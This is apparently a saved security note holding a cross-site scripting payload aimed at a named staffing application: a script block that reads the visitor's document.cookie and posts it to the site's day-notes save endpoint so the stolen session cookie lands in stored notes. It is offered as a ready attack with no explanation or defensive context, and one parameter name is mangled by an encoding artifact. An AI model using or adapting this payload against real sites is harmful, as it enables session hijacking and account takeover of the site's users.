notes/Callback Staffing Cookie to Notes-bCW8Q26G.sh
<script>
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
cookie=document.cookie;
xmlhttp.open("POST","https://www.callbackstaffing.com/Application/Ajax/Process/DayNotes/Save/",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("date=2015-01-01¬es="+cookie+"&activities=");
</script>
syntax highlighted by Code2HTML, v. 0.9.1